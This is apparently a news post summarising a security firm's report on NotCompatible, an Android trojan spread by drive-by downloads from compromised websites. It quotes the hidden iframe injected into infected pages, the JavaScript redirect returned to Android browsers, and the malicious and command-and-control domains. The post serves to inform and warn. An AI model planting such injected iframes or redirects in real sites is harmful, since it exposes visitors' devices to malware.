Fandroids are plagued with malware left and right.  Their device can get infected from downloading apps in Google Play but especially from unofficial third-party app stores.  But the worst part is, drive by download malware is now attacking Android devices.

NotCompatible

Lookout Mobile Security recently identified a drive by download malware dubbed as NotCompatible.  Drive by download is common in PCs.  When a user visits an infected site, the malware secretly infects the computer if it doesn’t have updated security measures.

NotCompatible works in a similar manner: if someone used his Android device in visiting an infected site, their web browser will automatically download an application and when it finishes downloading, the device displays a notification alerting the user to click on the notification to install the downloaded app.  But first, the “Unknown sources” setting should be enabled (this feature is commonly referred to as “sideloading”) or the installation would be blocked.

Lookout’s report stated that infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>

When a PC web browser is used to access the infected site, a “not found” error appears, but if a web browser containing the word “Android” in its user-agent header accesses the page, the following is returned:

<html><head></head><body><script  type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>

Lookout identified the following sites serving malicious Android apps:

• gaoanalitics.info
• androidonlinefix.info

While Command and Control (C&C) domains include:

• notcompatibleapp.eu

Lookout assured their subscribers that they are protected from NotCompatible, and reiterated that unless the app is actually installed, the device won’t become infected.

“Based on our current research,  NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update,” Lookout wrote in their updated report.

“This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy. As previously mentioned, this appears to be the first time that compromised websites have been used to distribute malware targeting Android devices.”